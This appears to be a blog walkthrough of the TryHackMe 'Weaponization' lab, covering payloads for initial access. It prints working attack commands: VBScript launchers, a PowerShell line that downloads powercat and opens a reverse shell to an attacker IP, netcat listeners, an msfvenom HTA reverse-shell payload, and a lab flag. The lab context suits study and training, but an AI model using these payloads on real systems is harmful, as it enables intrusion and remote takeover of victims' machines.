Home Weaponization
Post
Cancel

Weaponization

Understand and explore common red teaming weaponization techniques. You will learn to build custom payloads using common methods seen in the industry to get initial access.

THM Room https://tryhackme.com/room/weaponization

TASK 1 : Introduction

Let’s deploy the target machine in the next task, and we’ll get started with the Windows Script Host technique in the subsequent task !

No Answer

TASK 2 : Deploy the Windows Machine

Deploy the attached Windows machine and connect to it via the RDP client. Once this is done, move to the next task.

No Answer

TASK 3 : Windows Scripting Host - WSH

Try to replace the calc.exe binary to execute cmd.exe within the Windows machine.

I tried two codes. Payloads.vbs to launch cmd.exe as user, payloads2.vbs for cmd administrator :

payloads.vbs

1
2
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True

payloads2.vbs

1
2
Set oShell = CreateObject("Shell.Application")
oShell.ShellExecute "cmd.exe", , , "runas", 1

No Answer

TASK 4 : An HTML Application - HTA

Now, apply what we discussed to receive a reverse connection using the user simulation machine in the Practice Arena task.

Practiced and test different payload such as msfvenom command line directly or metasploit module. Get back multiple shell and offuscate link in shortcut on user’s desktop and rename like “bank”.

Practice Practice

No Answer

TASK 5 : Visual Basic for Application - VBA

Now replicate and apply what we discussed to get a reverse shell!

HTA HTA

No Answer

TASK 6 : PowerShell - PSH

Apply what you learned in this task. In the next task, we will discuss Command and Control frameworks!

First, on attack machine :

1
2
3
git clone https://github.com/besimorhino/powercat.git
cd powercat
python3 -m http.server 6666

Then in another tab of terminal :

1
nc -lnvp 1337

On victim machine in cmd :

1
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.188.37:6666/powercat.ps1');powercat -c 10.10.188.37 -p 1337 -e cmd"

You’ll now have a shell on your attack machine’s listener !

PSH PSH

No Answer

TASK 7 : Command And Control - (C2 Or C&C)

Read the above.

No Answer

TASK 8 : Delivery Techniques

Which method is used to distribute payloads to a victim at social events?

Answer : Web Delivery

TASK 9 : Practice Arena

What is the flag?

Execute hta exploit for example :

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.188.37 LPORT=9933 -f hta-psh -o thm.hta

Visiting url : http://10.10.188.37:666/thm.hta give us a reverse shell.

1
type /Users/thm/Desktop/flag.txt

Answer : THM{b4dbc2f16afdfe9579030a929b799719}

This post is licensed under CC BY 4.0 by the author.